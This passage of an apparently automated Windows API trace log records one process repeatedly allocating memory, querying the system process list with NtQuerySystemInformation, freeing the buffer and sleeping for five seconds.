SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.642] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.642] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.647] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.655] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.665] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.668] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.675] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.677] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.682] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.683] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.684] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.689] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.691] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.692] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.697] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.699] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.700] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.700] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.708] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.718] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.722] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.722] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.723] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.728] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.735] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.736] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.745] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.762] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.770] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.771] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.774] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.780] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.799] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.817] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.818] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.829] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0278.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0278.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0278.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0278.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0278.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0278.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0278.838] 